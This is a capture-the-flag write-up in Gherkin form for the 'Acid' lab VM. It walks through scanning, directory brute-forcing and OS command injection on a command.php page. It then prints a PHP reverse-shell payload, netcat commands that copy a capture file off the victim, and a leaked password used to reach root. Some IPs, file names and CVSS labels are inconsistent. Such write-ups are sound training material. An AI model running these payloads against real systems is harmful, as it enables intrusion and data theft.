## Version 1.4.1
## language: en

Feature:
  TOE:
    acid-server
  Location:
    http://192.168.59.130:33447
  CWE:
    CWE-548: Exposure of Information Through Directory Listing
    https://cwe.mitre.org/data/definitions/548.html
    CWE-78: Improper Neutralization of Special Elements used in an OS Command
    https://cwe.mitre.org/data/definitions/78.html
    CWE-269: Improper Privilege Management
    https://cwe.mitre.org/data/definitions/269.html
  Rule:
    R339. Avoid storing sensitive files in the web root
    https://fluidattacks.com/products/rules/list/339/
    R261. Avoid exposing sensitive information
    https://fluidattacks.com/products/rules/list/261/
    R160. Encode system outputs
    https://fluidattacks.com/products/rules/list/160/
    R186. Use the principle of least privilege
    https://fluidattacks.com/products/rules/list/186/
  Goal:
    Escalate privileges to root and capture the flag
  Recommendation:
    Keep control over sensitive data exposure and path OS Vulnerabilities

  Background:
  Hacker's software:
    | <Software name> | <Version> |
    | Parrot OS       | 4.11      |
    | Google Chrome   | 89.0.4    |
    | Gobuster        | 3.1.0     |
    | Nmap            | 7.9.1     |
    | Vmware 16 pro   | 16.1.0    |
    | Netcat          | 1.10-46   |
    | Wireshark       | 3.4.4     |
    | OpenSSH         | 8.4p1     |

  TOE information:
    Given the Acid VMDK file
    When I run it on Vmware
    And I realize that it is a personalized Linux machine
    And I see only the Acid login session [evidence](1.png)
    Then I check the Virtual Machine IP address
    """
    arp -a
    192.168.59.130
    """
    Then I scan the IP with Nmap [evidence](2.png)
    """
    nmap -sV -p- 192.167.59.130
    """
    And I can see 1 open port "33447/tcp open apache 2.4.10 Ubuntu"
    And I realize that it is a Ubuntu Server machine

  Scenario: Normal use case
    Given the open port "33447/tcp"
    When I visit the IP address "192.168.59.129:33447"
    And I realize that it is a website [evidence](3.png)

  Scenario: Static detection
    Given the website
    When I check the source code
    Then I found a clue at the end of the file [evidence](4.png)
    And I try to decode from Charcode to Base64
    And I got the clue "wow.jpg" [evidence](5.png)
    When I visit the url "192.168.59.129:33447/images/wow.jpg"
    Then I see a Meme image that trolled me [evidence](6.png)
    When I try with the page title [evidence](7.png)
    And I got a login website [evidence](8.png)
    When I perform a Gobuster scan [evidence](9.png)
    """
    gobuster dir -u http://192.168.59.130:33447/Challenge -w list.txt -x .php
    """
    And I visit the url "Challenge/cake.php"
    Then I realize about another clue in the page title [evidence](10.png)
    When I visit the new page "Challenge/Magic_box/"
    And I realize that it is forbidden
    When I perform a Gobuster scan [evidence](11.png)
    """
    gobuster dir -u http://192.168.59.130:33447/Challenge/Magic_Box/
    -w list.txt -x .php
    """
    Then I visit the url "/Challenge/Magic_Box/command.php"
    And I realize that there is website with input method [evidence](12.png)

  Scenario: Dynamic detection
    Given the website with input validation
    When I enter a basic "; ls" command
    And I got a console answer [evidence](13.png)
    And I realize that I can perform an Os Command Injection Attack

  Scenario: Exploitation
    Given the vulnerable website
    When I perform the OS Command Injection
    """
    ; php -r '$sock=fsockopen("192.168.59.1",1234);
    exec("/bin/bash -i <&3 >&3 2>&3");'
    """
    And I got shell access [evidence](14.png)
    Then I try to make an interactive shell with Privilege Escalation
    """
    python -c 'import pty;pty.spawn("/bin/bash")'
    exec "/bin/sh";
    """
    When I start to list the files in the machine
    And I realize about a file "investigate.php"
    Then I see the file content [evidence](15.png)
    """
    Now you have to behave like an investigator to catch the culprit
    """
    And I start to take a look in the "sbin" directory
    Then I found a strange directory "raw_vs_isi" [evidence](16.png)
    When I see inside the folder
    And I found a file "hint.pacpng"
    And I search for that file extension
    And I realize that this a "Dump File Format"
    Then I download the file
    """
    my machine: nc -nlvp 4444 > hint.pacpng
    victim machine: nc 192.168.59.1 4444 -w 3 < hint.pcapng
    """
    And I can read the file with Wireshark [evidence](17.png)
    And I realize that "1337hax0r" is the password for Saman user
    When I check it with the new credentials [evidence](18.png)
    And I realize that I am root now [evidence](19.png)
    And I get the flag [evidence](20.png)

  Scenario: Remediation
    When I do security test to the Web Apps sensitive data
    Then I can enforce the environment hardening
    And I can enforce a user and password control
    And I can keep in control the ".php" files
    And I try to keep update OS version
    And I try to keep restriction in input methods
    Then I avoid many vulnerabilities that could be attack vectors

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    8.5/10 (Critical) - AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/
  Temporal: Attributes that measure the exploit's popularity and fixability
    7.7/10 (Critical) - E:P/RL:X/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    5.3/10 (Critical) - CR:M/IR:L/AR:X/MAV:X/MAC:X/MPR:X/

  Scenario: Correlations
    No correlations have been found to this date 2021-04-08
